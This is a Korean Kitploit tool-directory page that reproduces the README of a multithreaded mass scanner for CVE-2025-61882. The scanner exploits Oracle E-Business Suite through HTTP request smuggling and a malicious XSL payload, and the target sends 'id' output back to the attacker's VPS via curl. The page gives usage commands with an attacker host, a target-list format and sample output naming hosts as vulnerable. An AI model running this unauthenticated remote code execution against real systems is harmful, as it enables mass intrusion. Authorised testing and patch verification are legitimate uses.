Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-61882 — # CVE-2025-61882 멀티스레드 스캐너 Oracle E-Business Suite의 CVE-2025-61882를 위한 멀티스레드 스캐너로, HTTP 요청 스머글링을 악용하여 인증 없이 원격 코드 실행을 달성하고 명령 출력을 통해 검증합니다. | Kitploit
도구/GitHubGitHub/sachinart/cve-2025-61882
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubsachinart/cve-2025-61882

CVE-2025-61882

# CVE-2025-61882 멀티스레드 스캐너 Oracle E-Business Suite의 CVE-2025-61882를 위한 멀티스레드 스캐너로, HTTP 요청 스머글링을 악용하여 인증 없이 원격 코드 실행을 달성하고 명령 출력을 통해 검증합니다.

저장소 보기
11710개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Oracle E-Business Suite RCE 스캐너 (CVE-2025-61882)

Oracle E-Business Suite 설치 환경에서 CVE-2025-61882를 탐지하는 빠르고 멀티스레드 기반 대량 스캐너입니다. 이 치명적인 취약점은 인증 없이 원격 코드 실행을 허용합니다.

Python Version License CVE

🎯 주요 기능

  • 대량 스캔 - 파일에서 수백 또는 수천 개의 대상 처리
  • 멀티스레드 - 동시 스캔 수 설정 가능 (기본값: 20개 스레드)
  • 자동 탐지 - id 명령 실행 및 출력 파싱을 통해 RCE 검증
  • 실시간 결과 - 취약한 대상은 vuln-output.txt에 즉시 기록
  • 랜덤 포트 - 충돌 방지를 위해 각 대상에 랜덤 포트(2000-9999) 사용
  • 깔끔한 출력 - 최소한의 노이즈로 진행 상황 추적

📋 요구 사항

root@kitploit:~
pip install requests

이것뿐입니다. Python 3.7+ 및 requests 라이브러리만 있으면 됩니다.

🚀 설치

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 사용 방법

기본 스캔

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP

빠른 스캔 (50개 스레드)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50

보수적 스캔 (10개 스레드)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10

📝 대상 파일 형식

각 줄에 URL 하나씩 포함된 targets.txt 파일을 생성하세요:

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 출력 예시

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Oracle E-Business Suite RCE Scanner (CVE-2025-61882)       ║
╚═══════════════════════════════════════════════════════════════╝

[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt

[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882

[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================

[+] Vulnerable targets found:

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 출력 파일

결과는 vuln-output.txt에 저장됩니다:

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 작동 원리

  1. CSRF 토큰 획득 - 대상에서 유효한 CSRF 토큰을 가져옴
  2. HTTP 요청 스머글링 - 스머글링 취약점을 악용하여 악성 페이로드 주입
  3. XSL 페이로드 전달 - 명령을 실행하는 악성 XSL 스타일시트 제공
  4. 콜백 검증 - 대상이 id 명령을 실행하고 curl을 통해 출력을 전송
  5. 정규식 매칭 - uid=...gid=... 패턴 확인을 통해 RCE 성공 여부 검증

⚙️ 설정

🔒 책임 있는 공개

이 도구는 승인된 보안 테스트 전용입니다. 항상:

  • ✅ 테스트 전에 서면 허가를 받으세요
  • ✅ 소유하거나 테스트에 대한 명시적 승인을 받은 시스템만 스캔하세요
  • ✅ 발견 사항을 관련 조직에 책임감 있게 보고하세요
  • ✅ 조정된 취약점 공개 절차를 따르세요
  • ❌ 승인되지 않은 시스템에는 절대 사용하지 마세요

승인되지 않은 컴퓨터 시스템 접근은 불법입니다.

🐛 알려진 문제

  • 일부 대상은 방화벽/IDS 차단으로 인해 시간 초과될 수 있음
  • 콜백 탐지는 대상이 랜덤 포트로 VPS에 도달할 수 있어야 함
  • SSL 인증서 경고는 억제됨 (펜테스트에 정상적인 동작)

🤝 기여

버그를 발견하셨나요? 기능 요청이 있으신가요?

  1. 저장소를 포크하세요
  2. 기능 브랜치를 생성하세요 (git checkout -b feature/amazing-feature)
  3. 변경 사항을 커밋하세요 (git commit -m 'Add some feature')
  4. 브랜치에 푸시하세요 (git push origin feature/amazing-feature)
  5. Pull Request를 열어주세요

📜 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다 - 자세한 내용은 LICENSE 파일을 참조하세요.

⚠️ 면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 작성자는 이 도구로 인해 발생하는 오용이나 손해에 대해 책임을 지지 않습니다. 사용에 따른 책임은 본인에게 있습니다.

📚 참고 자료

  • CVE-2025-61882 상세 정보
  • Oracle Critical Patch Update

👨‍💻 Chirag Artani 개발

웹사이트 • 트위터 • 링크드인

정보보안 커뮤니티를 위해 ❤️로 제작됨

도구 다운로드
인자필수기본값설명
--targets예-대상 URL이 포함된 파일 경로
--lhost예-VPS/공격자 IP 주소
--threads아니요20동시 스레드 수